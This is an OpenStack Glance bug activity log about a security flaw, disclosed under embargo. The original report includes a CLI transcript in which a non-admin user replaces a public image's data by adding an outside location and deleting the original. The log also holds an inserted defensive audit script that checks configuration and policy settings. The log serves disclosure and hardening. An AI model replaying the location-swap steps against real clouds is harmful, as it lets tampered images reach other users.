Activity log for bug #1549483

Date Who What changed Old value New value Message
2016-02-24 21:17:01 Mike Fedosin bug added bug
2016-02-24 21:48:00 Tristan Cacqueray bug task added ossa
2016-02-24 21:48:05 Tristan Cacqueray ossa: status New Incomplete
2016-02-24 21:48:24 Tristan Cacqueray description (old value and new value below; the new value only prepends the standard embargo notice to the otherwise unchanged report)

Old value:

Some time ago there was a security bug https://bugs.launchpad.net/glance/+bug/1525915 and a patch was proposed and merged in the Glance repo. Unfortunately it only partially fixed the problem and the issue with immutability still exists.

Bug description: A user (non-admin) can change image data by updating the location of an image when the "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows a malicious user to replace data after image activation.

mfedosin@wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------------------+--------------------------------------+
| Property         | Value                                |
+------------------+--------------------------------------+
| checksum         | None                                 |
| container_format | bare                                 |
| created_at       | 2015-11-10T18:41:53Z                 |
| disk_format      | qcow2                                |
| id               | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations        | []                                   |
| min_disk         | 0                                    |
| min_ram          | 0                                    |
| name             | good                                 |
| owner            | f3b42d4b90d840b8806e46fb4a7edca3     |
| protected        | False                                |
| size             | None                                 |
| status           | queued                               |
| tags             | []                                   |
| updated_at       | 2015-11-10T18:41:53Z                 |
| virtual_size     | None                                 |
| visibility       | public                               |
+------------------+--------------------------------------+

mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
+------------------+----------------------------------------------------------------------------------+
| Property         | Value                                                                            |
+------------------+----------------------------------------------------------------------------------+
| checksum         | None                                                                             |
| container_format | bare                                                                             |
| created_at       | 2015-11-10T18:41:53Z                                                             |
| disk_format      | qcow2                                                                            |
| file             | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file                             |
| id               | 2a745d21-66b7-43e0-90b5-ebe62232f7d6                                             |
| locations        | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata":    |
|                  | {}}]                                                                             |
| min_disk         | 0                                                                                |
| min_ram          | 0                                                                                |
| name             | good                                                                             |
| owner            | f3b42d4b90d840b8806e46fb4a7edca3                                                 |
| protected        | False                                                                            |
| schema           | /v2/schemas/image                                                                |
| size             | 43                                                                               |
| status           | active                                                                           |
| tags             | []                                                                               |
| updated_at       | 2015-11-10T18:42:21Z                                                             |
| virtual_size     | None                                                                             |
| visibility       | public                                                                           |
+------------------+----------------------------------------------------------------------------------+

mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
I'm really good image.

mfedosin@wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt'
+------------------+----------------------------------------------------------------------------------+
| Property         | Value                                                                            |
+------------------+----------------------------------------------------------------------------------+
| checksum         | None                                                                             |
| container_format | bare                                                                             |
| created_at       | 2015-11-10T18:41:53Z                                                             |
| disk_format      | qcow2                                                                            |
| file             | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file                             |
| id               | 2a745d21-66b7-43e0-90b5-ebe62232f7d6                                             |
| locations        | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata":    |
|                  | {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": |
|                  | {}}]                                                                             |
| min_disk         | 0                                                                                |
| min_ram          | 0                                                                                |
| name             | good                                                                             |
| owner            | f3b42d4b90d840b8806e46fb4a7edca3                                                 |
| protected        | False                                                                            |
| schema           | /v2/schemas/image                                                                |
| size             | 43                                                                               |
| status           | active                                                                           |
| tags             | []                                                                               |
| updated_at       | 2015-11-10T18:42:29Z                                                             |
| virtual_size     | None                                                                             |
| visibility       | public                                                                           |
+------------------+----------------------------------------------------------------------------------+

mfedosin@wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
mfedosin@wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin@wdev:~$ cat ooo
All your base are belong to us! Muahahaha!

New value:

This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.

--

[followed by the report and transcript given under "Old value" above, unchanged]
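Added example (editor's code, not part of the bug report or of Glance): an offline audit for the exposure the report describes. The log shows the OSSA task closed as Opinion and the issue tracked as an OSSN, i.e. handled as a deployment-hardening matter, so the check looks at deployment settings. It assumes the configuration option name from the report (show_multiple_locations in glance-api.conf [DEFAULT]) and the location rule names Glance's policy.json used at the time (set_image_location, delete_image_location, get_image_location); verify both against your own release. The config and policy fragments and the image records are constructed for the example; the first record mirrors the transcript above, where checksum stays None after location-add.

```python
"""Offline audit for the Glance location-rewrite exposure (constructed inputs)."""
import configparser
import json

# Constructed glance-api.conf fragments: the weak setting from the report beside the safe one.
WEAK_CONF = "[DEFAULT]\nshow_multiple_locations = True\n"
SAFE_CONF = "[DEFAULT]\nshow_multiple_locations = False\n"

# Constructed policy.json fragments. An empty string (or "@") means "any authenticated
# user"; the rule names are assumed to match the Glance policy.json of that era.
WEAK_POLICY = json.dumps({
    "default": "",
    "get_image_location": "",
    "set_image_location": "",
    "delete_image_location": "",
})
SAFE_POLICY = json.dumps({
    "default": "",
    "get_image_location": "role:admin",
    "set_image_location": "role:admin",
    "delete_image_location": "role:admin",
})

# The two rules that let a user attach new bytes to, and detach the original from, an image.
LOCATION_RULES = ("set_image_location", "delete_image_location")


def rule_is_open(policy, rule):
    """True if the rule (or, when absent, the default rule) admits every authenticated user."""
    expr = policy.get(rule, policy.get("default", ""))
    return expr.strip() in ("", "@")


def audit_config(conf_text, policy_text):
    """Report whether non-admin users can add/delete locations on images.

    The attack in the report needs both knobs: locations exposed through the API
    (show_multiple_locations = True) and location rules that are not restricted.
    """
    conf = configparser.ConfigParser()
    conf.read_string(conf_text)
    show_multi = conf.getboolean("DEFAULT", "show_multiple_locations", fallback=False)
    policy = json.loads(policy_text)
    open_rules = [r for r in LOCATION_RULES if rule_is_open(policy, r)]
    return {
        "show_multiple_locations": show_multi,
        "open_rules": open_rules,
        "exposed": show_multi and bool(open_rules),
    }


# Constructed image records in the shape of Glance v2 API responses. The first one
# mirrors the transcript in the report: active, location-backed, checksum None.
SAMPLE_IMAGES = [
    {"id": "2a745d21-66b7-43e0-90b5-ebe62232f7d6", "status": "active", "checksum": None,
     "locations": [{"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt",
                    "metadata": {}}]},
    {"id": "9f1c6d2e-0000-4000-8000-000000000001", "status": "active",
     "checksum": "3858f62230ac3c915f300c664312c63f",  # constructed value
     "locations": [{"url": "swift+https://example.invalid/v1/AUTH_x/glance/9f1c6d2e",
                    "metadata": {}}]},
    {"id": "9f1c6d2e-0000-4000-8000-000000000002", "status": "queued", "checksum": None,
     "locations": []},
]


def unverifiable_active_images(images):
    """IDs of active images with no checksum.

    Their bytes never passed through Glance (the data was attached by location, as in
    the report), so nothing pins what a later download returns. Treat these as the
    candidates for the replacement attack when the audit above reports exposure.
    """
    return [img["id"] for img in images
            if img.get("status") == "active" and not img.get("checksum")]


if __name__ == "__main__":
    print(audit_config(WEAK_CONF, WEAK_POLICY))   # exposed
    print(audit_config(SAFE_CONF, WEAK_POLICY))   # not exposed: locations hidden
    print(audit_config(WEAK_CONF, SAFE_POLICY))   # not exposed: rules admin-only
    print(unverifiable_active_images(SAMPLE_IMAGES))
```

Either knob alone closes the path the report demonstrates: hiding locations makes the location-add/location-delete calls unavailable, and restricting the two rules to role:admin leaves the API exposed but refuses the calls to ordinary users. Restricting only one of set_image_location or delete_image_location is not enough, since the report's sequence needs both (add the attacker's location, then delete the original); the audit therefore flags any open rule. Records flagged by unverifiable_active_images cannot be confirmed from metadata alone; re-download and hash them against an out-of-band reference before trusting them.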
2016-02-24 21:49:33 Tristan Cacqueray bug added subscriber Glance Core security contacts
2016-02-24 21:58:24 Flavio Percoco bug added subscriber Fei Long Wang
2016-03-29 18:17:22 Tristan Cacqueray bug added subscriber OSSG CoreSec
2016-03-29 20:30:04 Travis McPeak bug task added ossn
2016-04-07 17:37:52 Travis McPeak ossn: assignee hyakuhei (hyakuhei)
2016-05-03 21:55:02 Tristan Cacqueray ossa: status Incomplete Opinion
2016-05-31 19:54:58 Nikhil Komawar glance: status New Confirmed
2016-05-31 19:55:54 Nikhil Komawar glance: importance Undecided High
2016-05-31 19:56:38 Nikhil Komawar bug added subscriber Nova Core security contacts
2016-08-17 20:04:17 Travis McPeak ossn: assignee Robert Clark (robert-clark) Travis McPeak (travis-mcpeak)
2016-08-17 20:11:08 Travis McPeak ossn: assignee Travis McPeak (travis-mcpeak) Robert Clark (robert-clark)
2017-02-09 11:12:47 Luke Hinds description

Old value: the embargoed description set on 2016-02-24 21:48:24 above (embargo notice, "--" separator, then the report and transcript).

New value: the same report and transcript with the embargo notice and "--" separator removed; the text is otherwise identical to the original report above.
2017-02-09 11:12:57 Luke Hinds ossn: status New Fix Released
2017-02-09 11:13:09 Luke Hinds information type Private Security Public
2017-02-09 14:34:52 Jeremy Stanley tags security